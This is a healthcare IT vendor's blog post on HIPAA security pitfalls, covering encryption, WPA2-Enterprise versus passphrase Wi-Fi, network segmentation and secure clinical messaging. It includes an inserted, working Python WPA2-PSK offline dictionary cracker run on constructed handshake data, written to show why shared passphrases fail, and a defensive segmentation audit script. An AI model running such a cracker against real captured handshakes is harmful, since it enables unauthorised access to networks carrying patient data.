The past decade has seen an increase in concern about patient privacy.
Although HIPAA (the Health Insurance Portability and Accountability Act) has been in force since 1996, many providers and insurers still fail to handle their patients’ health records and other sensitive data safely.
Because confidential patient information flows through a wide range of channels, from health records to billing and clinical research, healthcare providers need to become wiser to the risk of that data falling into the hands of bad actors.
Failure to adhere to strict security standards can seriously harm a business's reputation as well as potentially lead to serious financial penalties.
Common HIPAA Pitfalls
The Office for Civil Rights (OCR) of the US Department of Health and Human Services takes HIPAA violations very seriously. When a breach takes place, the standard procedure is to investigate the origin of the issue and assess whether the healthcare provider or insurer had reasonable and appropriate safeguards in place to protect sensitive information.
Because compliance is a difficult matter, though, it is not uncommon for industry professionals to make mistakes. Below, we have gathered the common pitfalls we see most often, for your consideration.
Failing to Secure Sensitive Data Access
At the risk of stating the obvious, failure to properly encrypt sensitive patient info can lead to all kinds of disastrous consequences.
Encryption at Rest
We’ve all become used to encrypting data on our PCs and smartphones, and system administrators encrypt servers and network volumes. However, a few areas are often missed:
• Data stored on medical devices
• Data generated and stored by applications, which is frequently neither encrypted nor obfuscated
When we’ve inspected medical devices, we have observed cases that store network security credentials (usernames and passwords) in clear text or protected with trivially weak encryption.
Where application data is stored unencrypted, at minimum ensure that direct identifiers (PII) such as MRNs and patient names are stored separately from the clinical data they describe, for example behind a pseudonymous key, so that a copy of the application’s data store alone does not reveal who each record belongs to.
Encryption When in Transport
Applications often do not encrypt data themselves when transmitting it over a network. When this is the case, network-layer encryption must be employed. The wireless link should use WPA2-Enterprise (802.1X/EAP) at a minimum. WPA3 is now available, but a properly implemented WPA2-Enterprise deployment still meets the minimum bar for now. This requires several things:
• Not using “Personal” grade security (a.k.a. PSK or passphrase)
• Network segmentation
• Proper implementation
Personal grade security is for home networks. We must quit using it in healthcare networks, because it leaves massive security and operational maintenance issues. An attacker only needs to passively capture one client’s four-way handshake (freely available open-source tools do this) to run an offline dictionary attack against the passphrase, and many, arguably most, passphrases in use fall to such an attack. What’s more, the passphrase is shared by every device and never changes, so once the PSK is obtained, the traffic of any client whose handshake was captured can be decrypted, and rotating the passphrase means touching every device on the network.
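To make the point concrete, here is an added example (not code from the original post) that walks through what an attacker does with a captured WPA2-Personal handshake: derive the PMK from each candidate passphrase and the SSID, expand it to the PTK using the MAC addresses and nonces that were sent in the clear, and check the candidate against the MIC in the captured EAPOL-Key frame. The SSID, MAC addresses, nonces, EAPOL frame, passphrase and wordlist are all constructed for the illustration; only the Python standard library is used.

```python
"""Why a WPA2-Personal passphrase falls to an offline attack once one 4-way
handshake has been captured. Standard library only. The network below is
constructed for the illustration (hypothetical SSID, MACs, nonces, passphrase)."""
import hashlib
import hmac
from typing import Optional

SSID = "clinic-wifi"                          # constructed
TRUE_PASSPHRASE = "welcome2020"               # constructed, deliberately weak
AP_MAC = bytes.fromhex("001122334455")        # constructed
STA_MAC = bytes.fromhex("66778899aabb")       # constructed
# Real nonces are random per handshake; fixed here so the run is reproducible.
ANONCE = hashlib.sha256(b"anonce-example").digest()
SNONCE = hashlib.sha256(b"snonce-example").digest()
# Stand-in for EAPOL-Key message 2/4 with its 16-byte MIC field zeroed, which is
# how the attacker reconstructs it from the capture before checking a candidate.
EAPOL_M2_ZERO_MIC = bytes.fromhex("0103007502010a") + bytes(110)
# A tiny candidate list; real attacks run millions of candidates per minute on GPUs.
WORDLIST = ["password", "clinic123", "Welcome1", "welcome2020", "hunter2"]


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    It depends only on passphrase and SSID, so every device on the network shares
    the same PMK for as long as the passphrase is not changed."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3."""
    blocks = (hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4))
    return b"".join(blocks)[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of the MACs and nonces).
    Every input except the PMK is sent in the clear during the handshake."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_zero_mic: bytes) -> bytes:
    """WPA2 (AKM 00-0F-AC:2) key MIC: first 16 bytes of HMAC-SHA1 over the EAPOL-Key frame."""
    return hmac.new(kck, eapol_zero_mic, hashlib.sha1).digest()[:16]


def mic_for_passphrase(passphrase: str, ssid: str, ap_mac: bytes, sta_mac: bytes,
                       anonce: bytes, snonce: bytes, eapol_zero_mic: bytes) -> bytes:
    ptk = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    kck = ptk[:16]   # Key Confirmation Key; ptk[32:48] is the TK that encrypts the data frames
    return eapol_mic(kck, eapol_zero_mic)


def crack_psk(captured_mic: bytes, wordlist, ssid: str, ap_mac: bytes, sta_mac: bytes,
              anonce: bytes, snonce: bytes, eapol_zero_mic: bytes) -> Optional[str]:
    """Offline dictionary attack: no further interaction with the network is needed."""
    for candidate in wordlist:
        mic = mic_for_passphrase(candidate, ssid, ap_mac, sta_mac, anonce, snonce, eapol_zero_mic)
        if hmac.compare_digest(mic, captured_mic):
            return candidate
    return None


def demo() -> Optional[str]:
    """Simulate the capture with the true passphrase, then recover it from the wordlist."""
    captured_mic = mic_for_passphrase(TRUE_PASSPHRASE, SSID, AP_MAC, STA_MAC,
                                      ANONCE, SNONCE, EAPOL_M2_ZERO_MIC)
    return crack_psk(captured_mic, WORDLIST, SSID, AP_MAC, STA_MAC,
                     ANONCE, SNONCE, EAPOL_M2_ZERO_MIC)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

Two properties of the scheme carry the argument above: nothing in the check needs the network once the handshake is captured, and the PMK is a function of passphrase and SSID only, so the same PMK (combined with each captured handshake’s nonces) yields the session keys of every client whose handshake was recorded, until the passphrase is rotated on every device. WPA2-Enterprise derives a fresh PMK per user session from the EAP exchange, so there is no shared secret to crack offline in the same way.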
Network segmentation is enforced with firewalls, VLANs and access-control lists. It creates network sub-ecosystems that operate in their own bubbles, with a massive reduction in exposure to everything outside them. Sensitive PHI should live in small bubbles that are specific to its requirements…and no more. One huge “clinical” bubble is not sufficient. For example, a medical device should only be able to reach its centralized server and perhaps a middleware engine. When networks are implemented correctly, a device’s identity, established when it authenticates to the network, places it into a network segment that permits access to the intended resources and nothing more.
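As an added illustration (not from the original post; the device names, segments and flow-log lines are constructed), the following policy check shows the shape of identity-based segmentation: each device identity maps to a segment, each segment has a short allow-list of the destinations it actually needs, and anything else is denied and reported. Run over a few constructed flow-log lines it flags a pump reaching for the EHR database, a pump talking to another pump, and an unenrolled laptop.

```python
"""Default-deny segmentation policy checker over constructed flow-log lines.
Added illustration; device names, segments, ports and log lines are hypothetical."""
import re
from typing import List, Tuple

# Identity -> segment. In production this mapping is what 802.1X/RADIUS dynamic VLAN
# assignment or a NAC system produces from the device's certificate at authentication.
DEVICE_SEGMENT = {
    "infusion-pump-0417": "infusion_pumps",
    "infusion-pump-0522": "infusion_pumps",
    "pump-server-01": "pump_servers",
    "hl7-middleware-01": "middleware",
    "ehr-db-01": "ehr",
    "nurse-ws-12": "clinical_workstations",
}

# Per-segment allow-list of (destination segment, protocol, port). Anything not listed is
# denied, so a pump cannot reach the EHR, another pump, or anything but its own server.
ALLOWED_FLOWS = {
    "infusion_pumps": {("pump_servers", "tcp", 443), ("middleware", "tcp", 2575)},
    "pump_servers": {("middleware", "tcp", 2575)},
    "middleware": {("ehr", "tcp", 5432)},
    "clinical_workstations": {("ehr", "tcp", 443), ("middleware", "tcp", 2575)},
}

# Constructed flow log in a simple key=value format (not from any real firewall).
SAMPLE_FLOW_LOG = """\
2024-03-02T10:15:01Z src=infusion-pump-0417 dst=pump-server-01 proto=tcp dport=443
2024-03-02T10:15:07Z src=infusion-pump-0417 dst=ehr-db-01 proto=tcp dport=5432
2024-03-02T10:15:09Z src=infusion-pump-0522 dst=infusion-pump-0417 proto=tcp dport=22
2024-03-02T10:15:12Z src=nurse-ws-12 dst=ehr-db-01 proto=tcp dport=443
2024-03-02T10:15:15Z src=visitor-laptop-7 dst=pump-server-01 proto=tcp dport=443
"""

LINE_RE = re.compile(r"src=(\S+) dst=(\S+) proto=(\S+) dport=(\d+)")


def evaluate_flow(src: str, dst: str, proto: str, dport: int) -> Tuple[bool, str]:
    """Decide one flow. Unknown identities on either end are denied by default."""
    src_seg = DEVICE_SEGMENT.get(src)
    dst_seg = DEVICE_SEGMENT.get(dst)
    if src_seg is None:
        return False, f"{src} is not an enrolled identity (default deny)"
    if dst_seg is None:
        return False, f"{dst} is not an enrolled identity (default deny)"
    if (dst_seg, proto, dport) in ALLOWED_FLOWS.get(src_seg, set()):
        return True, "allowed"
    return False, f"{src_seg} -> {dst_seg} {proto}/{dport} is not in the allow-list"


def audit(log_text: str) -> List[str]:
    """Return a human-readable line for every flow that the policy would not permit."""
    violations = []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue  # malformed line; a real auditor would count these too
        src, dst, proto, dport = m.group(1), m.group(2), m.group(3), int(m.group(4))
        permitted, reason = evaluate_flow(src, dst, proto, dport)
        if not permitted:
            violations.append(f"{src} -> {dst} {proto}/{dport}: {reason}")
    return violations


if __name__ == "__main__":
    for v in audit(SAMPLE_FLOW_LOG):
        print("VIOLATION", v)
```

In a real deployment DEVICE_SEGMENT is the result of authentication (the certificate or account the device presented), ALLOWED_FLOWS becomes the firewall or ACL rule set between segments, and the audit over flow logs is the ongoing check that the deployed rules still match the intent, which is how the pump-to-pump and pump-to-EHR flows above would be caught if someone later loosened a rule.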
Proper implementation sounds obvious, but we find most organizations have huge implementation flaws. These flaws can result in an attacker obtaining usernames and passwords; a common one is WPA2-Enterprise clients that do not validate the RADIUS server’s certificate, which lets a rogue access point harvest credentials. Once obtained, those credentials thwart every encryption method, because the attacker now holds the keys to authorized access to the data.
Here’s how we help.
Authentication and encryption are tightly intertwined in the domain of network security. Authentication should leverage multiple factors (secondary biometrics, temporary codes or hardware credentials). This prevents an attacker who holds only a username and password from accessing data.
Good authentication underpins authorization. Authorization is the method of restricting what data and resources can be accessed. Without a thoughtful authentication strategy, you will never achieve a proper authorization or network segmentation implementation.
We have performed entire health system authentication overhauls that have then allowed granular segmentation down to the individual network device level. Ask us to share our insights.
Overlooking SMS and Email Encryption
All too often, Protected Health Information (PHI) is shared between the healthcare facility staff on their privately owned devices. This is usually due to a lack of a proper solution available to staff. Overlooking message encryption can not only give away sensitive data but can also result in hefty OCR fines.
Fostering a cybersecurity culture within a healthcare organization and conducting periodic cybersecurity assessments is the best way to make sure the business is HIPAA-compliant.
It is unlikely you’ll ever solve this problem until you give clinicians a proper solution. Simple secure texting solutions used to be all the rage until organizations realized they were not integrated into a clinical communication strategy. We strongly recommend a proper clinical communications solution. We are the healthcare industry’s #1 expert in clinical communications solution implementations.
Unnecessarily Storing of Protected Health Information
Because the risk of physical devices falling into the wrong hands is real, organizations should minimize the PHI stored on them and should not retain it for longer than strictly needed.
To limit the damage when a device is lost, clinical facilities should rely on messaging apps that meet HIPAA requirements, require multi-factor authentication, and allow all sensitive data to be wiped remotely.
The Bottom Line
Adhering to strict HIPAA standards can sometimes be a struggle for nationwide healthcare providers. Not taking these guidelines seriously can have serious consequences for clinical facilities. Ensuring your organization is up to speed with the latest cybersecurity tools is key to your continued success.
With the proliferation of clinician mobility solutions, healthcare delivery organizations now collect and manage significantly more patient data than ever before. With it, IT teams are now facing many more potential threats from thousands of sources. A breach can be extremely costly, but more importantly, it could introduce risk to patient care. Clinical Mobility is in business to minimize these risks. Contact us now to discuss how we can improve your security—without being sold boxes and licenses—we will optimize what you already own.
Clinical Mobility will ensure that your healthcare delivery organization will have the highest levels of security without compromising excellent network performance.